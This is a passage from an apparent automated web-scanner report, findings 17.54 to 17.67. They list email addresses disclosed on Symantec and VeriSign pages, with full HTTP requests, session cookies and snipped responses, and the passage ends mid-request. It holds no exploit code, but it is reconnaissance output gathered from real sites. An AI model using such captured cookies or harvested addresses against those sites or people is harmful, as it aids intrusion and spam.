Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000
Vary: Cookie
ETag: "1315602201"
Content-Type: text/html; charset=utf-8
X-Varnish: 1369354087 1369326710
X-Varnish-Cache: HIT
X-Varnish-Hits: 287
Vary: Accept-Encoding
Content-Length: 80043
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
Exams for FREE &ndash; Register now!
The first 100 candidates (customers or partners) to register for an SCS Certification or STS Accreditation exam will be able to take an exam for FREE!&nbsp; Email Customer_Certifications@Symantec.com&nbsp;or Partner... </div>
...[SNIP]...

17.54. http://www.symantec.com/searchg/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /searchg/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /searchg/common.js HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT
ETag: "db11-4b96e1c8"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 56081
Cache-Control: public, max-age=5333
Date: Fri, 09 Sep 2011 21:33:14 GMT
Connection: close

// copied from google3/java/com/google/caribou/antlers/fin/jsdata

//------------------------------------------------------------------------
// This file contains common utilities and basic javascrip
...[SNIP]...
ss = token.substring(1, (end != -1) ? end : token.length);
} else if (address == "") {
name += token;
}
i += token.length;
}

// Check if it's a simple email address of the form "jlim@google.com"
if (address == "" && name.indexOf("@") != -1) {
address = name;
name = "";
}

name = CollapseWhitespace(name);
name = StripQuotes(name, "'");
name = StripQuotes(name, "\"");
addre
...[SNIP]...

17.55. http://www.symantec.com/searchg/uri.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /searchg/uri.js

Issue detail

The following email address was disclosed in the response:

Request

GET /searchg/uri.js HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT
ETag: "44bc-4b96e1c8"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 17596
Cache-Control: public, max-age=5296
Date: Fri, 09 Sep 2011 21:33:14 GMT
Connection: close

// Copyright 2006 Google Inc.
// All Rights Reserved.

/**
* @fileoverview
* Implements RFC 3986 for parsing/formatting URIs.
*
* @author msamuel@google.com
*/

/**
* creates a uri from the string form. The parser is relaxed, so special
* characters that aren't escaped but don't cause ambiguities will not cause
* parse failures.
*
* @return {URI|Nu
...[SNIP]...

17.56. http://www.verisign.ch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.57. http://www.verisign.ch/contact-information/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /contact-information/index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-information/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="/assets/corp/css/corp_generic_st
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...
<a href="mailto:sales@verisign.ch">sales@verisign.ch</a>
...[SNIP]...
<a href="mailto:enterprise-sales@verisign.ch">enterprise-sales@verisign.ch</a>
...[SNIP]...
<a href="mailto:billing@verisign.ch">billing@verisign.ch</a>
...[SNIP]...
<a href="mailto:sales@verisign.ch">
...[SNIP]...

17.58. http://www.verisign.ch/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /corporate/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.59. http://www.verisign.ch/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /trust-seal/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 50059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VeriSign Trust Seal - Perfec
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.60. http://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:24:37 GMT
Content-Type: text/html
Content-Length: 34615

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.61. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

Issue detail

The following email addresses were disclosed in the response:

Request

GET /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581

Response

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Content-Length: 77864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...
<a href="mailto:support@verisign.com">support@verisign.com</a>
...[SNIP]...

17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1614
Content-Type: text/html

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.63. http://www.verisign.com/code-signing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /code-signing/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /code-signing/index.html?tid=a_box HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 103179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!--HEADER ASSETS
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /partners/ssl-reseller-programs/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:13 GMT
Content-Type: text/html
Content-Length: 51846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:24 GMT
Content-Type: text/html
Content-Length: 34515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/resell-ssl/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:19 GMT
Content-Type: text/html
Content-Length: 37523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /ssl/buy-ssl-certificates/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /ssl/buy-ssl-certificates/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
